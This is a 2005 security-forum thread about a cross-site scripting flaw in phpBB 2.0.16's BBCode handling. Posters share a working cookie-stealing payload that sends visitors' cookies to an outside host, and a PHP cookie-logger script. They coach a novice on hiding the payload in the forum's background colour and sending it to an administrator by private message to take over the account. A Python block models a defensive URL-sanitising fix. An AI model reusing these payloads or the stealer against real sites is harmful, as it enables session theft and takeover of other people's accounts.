Waraxe IT Security Portal  
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
Posted: Fri Jul 08, 2005 8:11 pm
zer0-c00l (Advanced user)
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!

More info at:
http://www.milw0rm.com/id.php?id=1095

Posted: Sat Jul 09, 2005 2:36 pm
verbatim (Regular user)
Joined: Jul 09, 2005
Posts: 11

Waouh, a new flaw in phpBB!

I'm totally new to XSS remote cookie exploits; would you be kind enough to explain to me (personally or with a good tutorial) how to use this exploit?

Thank you in advance.

Posted: Sat Jul 09, 2005 9:01 pm
diaga (Regular user)
Joined: Jun 27, 2005
Posts: 22

I'm getting

Code:
'

Posted: Sun Jul 10, 2005 12:28 am
WaterBird (Active user)
Joined: May 16, 2005
Posts: 37

Hmm, posted it and nothing is happening :/

Posted: Sun Jul 10, 2005 2:35 am
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

First of all, nothing is there,
and it won't redirect; that link doesn't exist.

http://www.milw0rm.com/cgi-bin/shell.jpg

This exploit originally comes from http://antichat.ru/txt/phpbb/
and not from ccteam, as you can see from the exploit banner on the milw0rm site.

http://antichat.ru/txt/phpbb/ <<< visit here.

Posted: Sun Jul 10, 2005 5:39 am
g30rg3_x (Active user)
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE

First...
Cross Site Scripting (aka XSS) bugs
can only execute on the client side.

So...
This is not a simple bug where you run it and get the admin hash.

And what can I do with this???
You can send an exploit like the one /str0ke put on milw0rm, of course via PM, and you can steal his cookie when he opens the PM.
Of course, as you can read, this bug only works with IE and not with other browsers.

Can you give a PoC??
Umm, the original, which is in Russian, gives two PoCs.

The first prints a JS alert with the message lol
Code:

[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`alert('lol');this.sss=null`s='][/url][/url]'


The second steals a cookie, but you have to put the background value in the place where ЦВЕТ_ФОНА appears
Code:

[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


Obviously, like the str0ke bug, you have to redirect to your website for stealing the cookie:
http://antichat.ru/b.gif

So that's all about it.

I think this info would be very useful for some people.
If you have questions you can ask here or by my MSN.

Regards
PS: There is no official patch, so have fun...

Posted: Sun Jul 10, 2005 7:45 am
y3dips (Valuable expert)
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

Another bbcode flaw in combination with social engineering, I think *_^

_________________
IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sun Jul 10, 2005 8:54 am
verbatim (Regular user)
Joined: Jul 09, 2005
Posts: 11

First, thank you for your answers and your help!

subzero wrote:

This exploit originally comes from http://antichat.ru/txt/phpbb/
and not from ccteam, as you can see from the exploit banner on the milw0rm site.

http://antichat.ru/txt/phpbb/ <<< visit here.

Yes, I had read it (even if I don't speak Russian).

g30rg3_x wrote:

Of course, as you can read, this bug only works with IE and not with other browsers.

Now I understand why I couldn't see it. lol

g30rg3_x wrote:

The second steals a cookie, but you have to put the background value in the place where ЦВЕТ_ФОНА appears
Code:

[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


Obviously, like the str0ke bug, you have to redirect to your website for stealing the cookie:
http://antichat.ru/b.gif

Humm, I've got 2 questions...
1- The color ЦВЕТ_ФОНА... this value has to be changed to a color of the target forum, probably to hide the script... but which color? You said "the background" but I don't understand...

2- To redirect to our stealer script, by changing the http://antichat.ru/cgi-bin/s.jpg? URL: how do we create our own cookie stealer?

By the way, g30rg3_x, did you manage to use this exploit?

Thank you in advance.

Posted: Sun Jul 10, 2005 10:24 am
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

Mmm,
g30rg3_x,

sorry but I don't understand what you mean by "only works on IE"??

verbatim <<= the exploit does work.

Exploit:
http://kisobox.com/exploits/phpbb.2.0.16.xss+cookies.stealer.txt

It will be easier to understand from the video:
http://kisobox.com/area51/phpbb2.0.16xss/

It will be better to have your own cookie stealer script rather than depend on antichat.ru
again. If you want to get the admin's password hash, then you just PM him/her.

Last edited by subzero on Sun Jul 10, 2005 1:55 pm; edited 1 time in total

Posted: Sun Jul 10, 2005 11:20 am
verbatim (Regular user)
Joined: Jul 09, 2005
Posts: 11

Great video, subzero!

1- I still wonder... when you write
Quote:
template color, so no one can see it.
// you can do it.. by viewing page source code.

the template has many colors... which one do you mean?

2- How do we have our own cookie stealer script rather than depend on antichat.ru
again?

Thank you.

Posted: Sun Jul 10, 2005 11:48 am
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

About viewing the source code... oohh, too many... well, forget about it.

2. Some code
for a cookie stealer:

<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>


Posted: Sun Jul 10, 2005 12:20 pm
verbatim (Regular user)
Joined: Jul 09, 2005
Posts: 11

OK, so imagine:
1- I create a file cookie.php with inside:
Code:
<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>


2- I change the URL of the exploit:
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

I tried to replace http://antichat.ru/cgi-bin/s.jpg? with http://mysite.com/cookie.php
but it creates no cookies.txt file; there's probably something wrong in my syntax

Posted: Sun Jul 10, 2005 12:21 pm
waraxe (Site admin)
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

I was testing this bbcode flaw yesterday and it worked even here, at waraxe.us

Some remarks:

1. It will work with IE only (no Firefox, etc ...)
2. The phpBB team has no clue about this, and so most of the phpBB installations in the world are affected.
3. I was making some simple changes to the bbcode regexes, so right now this forum is (hopefully) protected from this specific exploit.

It's interesting to see how much time it takes the phpBB development team to release phpBB version 2.0.17
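A Python model of the kind of fix waraxe describes in remark 3, added here as an example; it is not phpBB's code and not the regex change made on this forum. It assumes a simplified [url=...]...[/url] tag, uses the first PoC from g30rg3_x's post as a constructed sample, and contrasts a renderer that drops the tag argument into href unchecked with one that validates and escapes it, plus a check that the emitted HTML carries no style attribute or expression() body.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample: the first PoC from this thread reduced to its inner
# [url=...] tag. The quotes in the argument are what close href early.
POSTED_PAYLOAD = ("[url=www.s=''style='top:expression(eval(this.sss));'"
                  "sss=`alert('lol');this.sss=null`s=']x[/url]")

URL_TAG = re.compile(r"\[url=(.+?)\](.*?)\[/url\]", re.S)

def render_url_weak(bbcode):
    # Flawed pattern: the tag argument goes straight into href, so a quote in it
    # ends the attribute and the rest (style=...) becomes attributes of the <a>.
    return URL_TAG.sub(lambda m: f"<a href='{m.group(1)}'>{m.group(2)}</a>", bbcode)

def safe_url(value):
    # Hardened policy (assumption, not phpBB's rules): reject quotes, whitespace,
    # <>, backticks and control chars; allow-list scheme; auto-prefix bare www. hosts.
    if re.search(r"[\s'\"<>`\x00-\x1f]", value):
        return None
    if "://" not in value:
        if not value.lower().startswith("www."):
            return None  # also refuses javascript:, data:, vbscript: forms
        value = "http://" + value
    parts = urlsplit(value)
    if parts.scheme.lower() not in ("http", "https", "ftp") or not parts.netloc:
        return None
    return value

def render_url_hardened(bbcode):
    # Validated URL and HTML-escaped attribute and body; a tag whose argument
    # fails validation is emitted as escaped text rather than guessed at.
    def repl(m):
        url = safe_url(m.group(1))
        if url is None:
            return html.escape(m.group(0))
        return f'<a href="{html.escape(url)}">{html.escape(m.group(2))}</a>'
    return URL_TAG.sub(repl, bbcode)

def is_neutralised(rendered):
    # True when no emitted tag carries a style attribute or an IE expression()
    # body, i.e. the markup offers no route to script execution.
    return re.search(r"<[^>]*\b(style\s*=|expression\s*\()", rendered, re.I) is None

if __name__ == "__main__":
    print(is_neutralised(render_url_weak(POSTED_PAYLOAD)))       # False
    print(is_neutralised(render_url_hardened(POSTED_PAYLOAD)))   # True
```

The hardened renderer only closes this one route at output time; setting the session cookie with the HttpOnly flag additionally keeps document.cookie out of reach of any script that still gets through, which is what the second PoC in the thread depends on.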

Posted: Sun Jul 10, 2005 12:30 pm
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

verbatim,

have you set chmod 777 on the cookies.txt?

It's good if you release the patch for it,
waraxe... one of my sites is vulnerable too.

Posted: Sun Jul 10, 2005 12:44 pm
verbatim (Regular user)
Joined: Jul 09, 2005
Posts: 11

subzero wrote:
verbatim,

have you set chmod 777 on the cookies.txt?


Yes, I have... but this file is still empty
Any ideas?
Is there a mistake here:
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookie.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Finally, did you manage to use this exploit with a personal stealer script?

(I know, a lot of questions, but I guess it may help other readers)
All times are GMT  
Page 1 of 8  
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"